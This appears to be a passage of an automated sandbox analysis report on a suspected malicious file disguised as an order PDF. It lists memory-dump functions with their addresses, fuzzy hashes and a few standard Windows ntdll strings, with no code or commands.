Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
Instruction ID: 3ad9d6bd720b394802ab90b911d0c764295442333d37a8ddbba3bfcf5f89e6bf
Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
Instruction Fuzzy Hash: 92D012371E054DBBCB119F66DC01F957BA9FBA4BA0F444020B5098B5A0C63AE960D584

Function 0160CA24 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22eac3cf23e744978c38815586d49d248984a6dff058c4bc926ba008d42a7b2c
Instruction ID: f013145d169007e0237e44c7cfb78ee8500323ea8036820ab41e97d94c062193
Opcode Fuzzy Hash: 22eac3cf23e744978c38815586d49d248984a6dff058c4bc926ba008d42a7b2c
Instruction Fuzzy Hash: 81D09E349565129BDF1BDB59CD1497A7AB4FF54640B4001A8EA0156660D325D8618650

Function 015E02A0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
Instruction ID: 4437cab79a962e901dbf3b396a74b6232c81fb6e63e11826cbaac07e37a0bf38
Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
Instruction Fuzzy Hash: 86D0E935B56E80CFD61BCB5DC9A8B1973F4BB84B44F854490F541CBB62D66CD944CE40

Function 0160C700 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
Instruction ID: 57c760c6493f3b66af97f890ac709eec1365c6ab2dae7e725f4e154047c1ea6c
Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
Instruction Fuzzy Hash: 16C012322A0648AFC716AA99CD01F027BA9FBA8B40F000061F2098B670C631E820EA84

Function 00416CDC Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1488235517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RFQ31072024_August order_pdf.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c560a6af5c91a2533be5413edffa3d5a8a80be96ffbbc3521a064f8a56d9448
Instruction ID: de52b692a88441c8e8959b1b71dbaf7c70bdb10308c7f6b396be233ffc98226c
Opcode Fuzzy Hash: 0c560a6af5c91a2533be5413edffa3d5a8a80be96ffbbc3521a064f8a56d9448
Instruction Fuzzy Hash: 11A00167F5A1180A64685C697C960BAE378D28B1BAE3077A7DD0CF3A416496C42601DF

Function 015F0310 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction ID: 0d70b9a06fa1724c60ccee02c9efc27fa9bf8d9a2a247bf79566db3cc9fac88a
Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction Fuzzy Hash: D2D01236140249EFCB01DF45C890D9A772BFBD8710F148019FD190B6518A31ED62DA50

Function 0040E471 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1488235517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RFQ31072024_August order_pdf.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d00d6d2aa2aed252603ea0362990599fb1a6cca998029172d19a29a0911311d8
Instruction ID: 797cd15f5cca9377cbd00a8d0924ad4702345df448c2ace06e9665fc16313db8
Opcode Fuzzy Hash: d00d6d2aa2aed252603ea0362990599fb1a6cca998029172d19a29a0911311d8
Instruction Fuzzy Hash: D0A00117F861180658686C8E78510B4EB65E2DB076E6436ABDE0DF35801846C82505AE

Function 015D0750 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
Instruction ID: cd7b09cf0c619f6c707a63227835b74fae942d522f5bcf0d4b14858e1994c36c
Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
Instruction Fuzzy Hash: 23C04C757019468FDF15DB59D794F4577E4F754740F1518D0E805CBB21E725E801CA10

Function 01614340 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbc9c33e9610b0c7192809816ae6fb798d2e285bee77de67f09995c9c13f037e
Instruction ID: 182ddd8312b6c3dbd46b9c98327660b402796015919df11992be1a0f002ace5f
Opcode Fuzzy Hash: dbc9c33e9610b0c7192809816ae6fb798d2e285bee77de67f09995c9c13f037e
Instruction Fuzzy Hash: E2900231605C1012914075584C855474049A7E0301B55C011E4424658DCE148A565761

Function 01614650 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffe64bcb1a98a50a27c9f476efd8bdca51a0b7909385c16302bd3d99ed59732b
Instruction ID: 9ce050461c9b8b02394a3d2d2d408b03ac49e894ec2ea56aa1d32561ea713bcd
Opcode Fuzzy Hash: ffe64bcb1a98a50a27c9f476efd8bdca51a0b7909385c16302bd3d99ed59732b
Instruction Fuzzy Hash: 1E90026160191042414075584C054076049A7E1301395C115E4554664DCA1889559769

Function 01612BE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0f4eb3cc581ae0ae895d11b3683fae25519968b127c0f27e2d75103db227075
Instruction ID: 7316a9b4f2919a592cdd748088656e9950714ffd01c076508552fcbd645f1553
Opcode Fuzzy Hash: b0f4eb3cc581ae0ae895d11b3683fae25519968b127c0f27e2d75103db227075
Instruction Fuzzy Hash: 9B90023120585842D14075584C05A47005997D0305F55C011E4064798EDA258E55BB61

Function 01612BA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30322239d1f8e9c4e0964240827453e2394f029fb5cfccdc9bdc6882b9fc02e1
Instruction ID: c95812f93d79f4ba80725195ba96fcc9526d6746d45e9ceba21a11ee97086a5b
Opcode Fuzzy Hash: 30322239d1f8e9c4e0964240827453e2394f029fb5cfccdc9bdc6882b9fc02e1
Instruction Fuzzy Hash: EB90023160581802D15075584C15747004997D0301F55C011E4024758ECB558B557BA1

Function 01612B80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2a7ce616ca57579efe4ce8d5daecf1c008f8b2eb69eda7dc7f3536bf460d66f
Instruction ID: 0847501610ea457dba34d9d40144a0488c0f2ca9136507569e1367d191c0fad9
Opcode Fuzzy Hash: b2a7ce616ca57579efe4ce8d5daecf1c008f8b2eb69eda7dc7f3536bf460d66f
Instruction Fuzzy Hash: 8E90023120181802D10475584C05687004997D0301F55C011EA024759FDA6589917631

Function 01612AF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 584344bf19ad418d0b8790ddbf4e8ad314a3cc28b88a0b2a52ff5c71c1040573
Instruction ID: 4b9f1fa8396806b2b0981abdb94c5a58f0da719c01d1b2a921af3fd187418abe
Opcode Fuzzy Hash: 584344bf19ad418d0b8790ddbf4e8ad314a3cc28b88a0b2a52ff5c71c1040573
Instruction Fuzzy Hash: 07900225221810020145B9580E0550B0489A7D6351395C015F5416694DCA2189655721

Function 01612AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 678c0fcab6939262f0b68bfce60a321d89f6e4708b02d36017aeab0d48611a5c
Instruction ID: 51f0601e712df9623c1aa807e8ae6a3e386c3a58192eca49ab1b679d5c42f2cb
Opcode Fuzzy Hash: 678c0fcab6939262f0b68bfce60a321d89f6e4708b02d36017aeab0d48611a5c
Instruction Fuzzy Hash: F59002A1201950924500B6588C05B0B454997E0201B55C016E5054664DC92589519635

Function 01612D00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b056be94b8f608a9a891dff598454a6b087aed6827322934800898ecbf13f69
Instruction ID: 8ae3af0961e17e163f14ed6efd44a61bde7d199a385b156cdf98b44d18c762bc
Opcode Fuzzy Hash: 7b056be94b8f608a9a891dff598454a6b087aed6827322934800898ecbf13f69
Instruction Fuzzy Hash: 7990022120585442D10079585C09A07004997D0205F55D011E5064699ECA358951A631

Function 01612DB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4346d04603354bfeae4fcf7946a1591e2a047d7052186db883f39cf469d55e0
Instruction ID: 19522ceb493b034e23a42e250b192d1ee936899db4701f6dfee97dad8bf6df3c
Opcode Fuzzy Hash: c4346d04603354bfeae4fcf7946a1591e2a047d7052186db883f39cf469d55e0
Instruction Fuzzy Hash: 2390023124181402D14175584C05607004DA7D0241F95C012E4424658FCA558B56AF61

Function 01612C60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91d7e8766ddd396209096271a817aeadfb3d10b1c41f05354077860c5bc7a459
Instruction ID: f27590f5075f61692d0762b60d6e86254475afe70700479a13376580bf8b053d
Opcode Fuzzy Hash: 91d7e8766ddd396209096271a817aeadfb3d10b1c41f05354077860c5bc7a459
Instruction Fuzzy Hash: 6790023120181842D10075584C05B47004997E0301F55C016E4124758ECA15C9517A21

Function 01612CF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c0c2235a29883b3e209bd1bbda2346698d6773635f62bcf77674d7d43d12e7e
Instruction ID: ba011ee8e54494f1564ca60909a2c7f010109dae1e61afed16ff001c94b1c204
Opcode Fuzzy Hash: 0c0c2235a29883b3e209bd1bbda2346698d6773635f62bcf77674d7d43d12e7e
Instruction Fuzzy Hash: 5590023120181403D10075585D09707004997D0201F55D411E442465CEDA5689516621

Function 01612CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08c1922825a493b42c33940e9339884d0398d4fdf64a1351f3da97e71db8c2ba
Instruction ID: a7629691f331ce7ee7786ea1706cb93204456e95af45a9efa837a874631d609d
Opcode Fuzzy Hash: 08c1922825a493b42c33940e9339884d0398d4fdf64a1351f3da97e71db8c2ba
Instruction Fuzzy Hash: 7790022160581402D14075585C19707005997D0201F55D011E4024658ECA598B556BA1

Function 01612F60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fafa62022b014fbc9640652edac352fd74982f855f52a7aff9deabfffb3628e
Instruction ID: 211424f88e307c8fb2dae9aa59790ed887084260a52e7c3573263ae868dadc1f
Opcode Fuzzy Hash: 8fafa62022b014fbc9640652edac352fd74982f855f52a7aff9deabfffb3628e
Instruction Fuzzy Hash: EB90026121181042D10475584C05707008997E1201F55C012E6154658DC9298D615625

Function 01612FA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9ae916370eb0a9632707bdd35bb78a8883aa287e704dcf04f1088ca0dc004f7
Instruction ID: dd6f0fd21885ba96a4362b85e431599dfa89e75604a024e2fc0e3b65c0772a29
Opcode Fuzzy Hash: f9ae916370eb0a9632707bdd35bb78a8883aa287e704dcf04f1088ca0dc004f7
Instruction Fuzzy Hash: E2900231201C1402D10075584C09747004997D0302F55C011E9164659FCA65C9916A31

Function 01612E30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8119164aa9d85125471ebaffaea0de6206059906f888643893d5192593301a0
Instruction ID: 3ffd90e8e70154620b81279f63ab7a864a72bfe1d90cae1b267e58e529c30c91
Opcode Fuzzy Hash: b8119164aa9d85125471ebaffaea0de6206059906f888643893d5192593301a0
Instruction Fuzzy Hash: 3790022130181402D10275584C15607004DD7D1345F95C012E5424659ECA258A53A632

Function 01612EE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05186317a2b3b32fbccb3c26beb05f3a8b5007939f4faf5f3171bf6af87f79b7
Instruction ID: 885b81f58ed79e057bd16e07dcd984f5d28de4dc2461f6936f8f42969f794011
Opcode Fuzzy Hash: 05186317a2b3b32fbccb3c26beb05f3a8b5007939f4faf5f3171bf6af87f79b7
Instruction Fuzzy Hash: B6900261201C1403D14079584C05607004997D0302F55C011E6064659FCE298D516635

Function 01613010 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b52e1f274e18111c70c4dc4e0076742631202e910a1613efcd75be380bd43d5
Instruction ID: aea657b6dd8581215e6aabb95eab5166c07ae6c70cb241c3e527b86a3e886780
Opcode Fuzzy Hash: 2b52e1f274e18111c70c4dc4e0076742631202e910a1613efcd75be380bd43d5
Instruction Fuzzy Hash: 0F900221201C5442D14076584C05B0F414997E1202F95C019E8156658DCD1589555B21

Function 01613090 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73ac1a79a6e780b5a90d814a307b2ce8cd25890c041567d173c5219c756c9428
Instruction ID: 2547bd809a4ece33647f1d332d2b44ff13803446d68000b6dac706def0c044d5
Opcode Fuzzy Hash: 73ac1a79a6e780b5a90d814a307b2ce8cd25890c041567d173c5219c756c9428
Instruction Fuzzy Hash: 3390022124181802D14075588C15707004AD7D0601F55C011E4024658ECA168A656BB1

Function 016135C0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 900d143fe8d980f3b1feba00b3663811ee9c61412491fdd852231f881918598d
Instruction ID: 3c3f61a017173325ca8e9ec00c062b9c55d1fbc34442aab300bcc62d8822af3a
Opcode Fuzzy Hash: 900d143fe8d980f3b1feba00b3663811ee9c61412491fdd852231f881918598d
Instruction Fuzzy Hash: C090023160591402D10075584D15707104997D0201F65C411E442466CECB958A516AA2

Function 016139B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1aafce500b0e532c8f340b64f3bf2ef3bf3c0cc0560e1be968d6b9208e94e246
Instruction ID: e7d6a68b76468e1c6c1b18cf1d64ee903f967c7ef74539dbfe9886db10ea4c49
Opcode Fuzzy Hash: 1aafce500b0e532c8f340b64f3bf2ef3bf3c0cc0560e1be968d6b9208e94e246
Instruction Fuzzy Hash: B990022124586102D150755C4C056174049B7E0201F55C021E4814698EC95589556721

Function 01613D70 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b811cdcdaa72b7aa4ff8f5d473dd84891510581a6e760f40e8fc0f9569a0a822
Instruction ID: cef4d29ddcb0f6a309c3a40c0a4c8392598d37a1898b57df1faf7695a2931801
Opcode Fuzzy Hash: b811cdcdaa72b7aa4ff8f5d473dd84891510581a6e760f40e8fc0f9569a0a822
Instruction Fuzzy Hash: 8890023520181402D51075585C05647008A97D0301F55D411E442465CECA5489A1A621

Function 01613D10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b85a887065c430160460fb79d904ca6cb33d98e6de249cc51b2fcee771821dde
Instruction ID: be2b0a1a3b31bff3413f0eba3e9562a20931b89c3eccdf378efdc6a86fb67dae
Opcode Fuzzy Hash: b85a887065c430160460fb79d904ca6cb33d98e6de249cc51b2fcee771821dde
Instruction Fuzzy Hash: C790023120281142954076585C05A4F414997E1302B95D415E4015658DCD1489615721

Function 01612C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: b63a207241a7d351a0224af561503c5aa0c46b6dd5a1f7ba940cc6fb92d7acec
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 01612890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0161293C
___swprintf_l.LIBCMT ref: 0161295E
___swprintf_l.LIBCMT ref: 016129A3
___swprintf_l.LIBCMT ref: 0164A52E

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 0164A54E
ffff:, xrefs: 0164A504
:%u.%u.%u.%u, xrefs: 0164A5B8
::%hs%u.%u.%u.%u, xrefs: 0164A527

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: a84ad75c20e76b955be83d7b7d08a7def6e367b0c8d50d514152ddbdb6f608f7
Instruction ID: a6829fc1494ed08a29d009c1b379e38989a7217fff204e3aacebfd26a27646cd
Opcode Fuzzy Hash: a84ad75c20e76b955be83d7b7d08a7def6e367b0c8d50d514152ddbdb6f608f7
Instruction Fuzzy Hash: CC5105B6A00116BFDB11DFAD8DA097EFBB9BB08240728C62DE465D7645D334DE048BE0

Function 01682410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 016824A6
___swprintf_l.LIBCMT ref: 016824E2
___swprintf_l.LIBCMT ref: 0168257D
___swprintf_l.LIBCMT ref: 016825A3
___swprintf_l.LIBCMT ref: 016825C8
___swprintf_l.LIBCMT ref: 01682608

Strings

:%u.%u.%u.%u, xrefs: 016825FF
::%hs%u.%u.%u.%u, xrefs: 0168249E
ffff:, xrefs: 0168247D, 0168249D
::ffff:0:%u.%u.%u.%u, xrefs: 016824DA

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 36679c72ce197927796b574291c802500f83e77b53a68c015bf0ee37bfccb3e9
Instruction ID: 0291b412cc02ec8d45f4a7afa689cf95188b85626742bb7300c8cdf1b8f298d3
Opcode Fuzzy Hash: 36679c72ce197927796b574291c802500f83e77b53a68c015bf0ee37bfccb3e9
Instruction Fuzzy Hash: 9E51F2B5A40646AECB30EF9CCCA097FBBF9AF44200B44856DE596D7641E774EA40CB70

Function 01607630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

Execute=1, xrefs: 01644713
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01644655
ExecuteOptions, xrefs: 016446A0
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01644742
CLIENT(ntdll): Processing section info %ws..., xrefs: 01644787
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01644725
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 016446FC

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: ca9a686d4ef9c95a35401a783ce2c1571973cd9a9fb3a957a3b2b53ffa9869ef
Instruction ID: 4b0fe321ec20cde6c7a47b971ffe006fd5c8eef090666b5e83ecc46271278e6c
Opcode Fuzzy Hash: ca9a686d4ef9c95a35401a783ce2c1571973cd9a9fb3a957a3b2b53ffa9869ef
Instruction Fuzzy Hash: B6513931600219ABEF26EBA8DC95FBB77A9EF14340F14009DE605AB2C1DB71AA41CF54

Function 0161B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0161B6BF

Strings

0, xrefs: 0161B695
-, xrefs: 0161B650
0, xrefs: 0161B66F
+, xrefs: 0161B65A

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
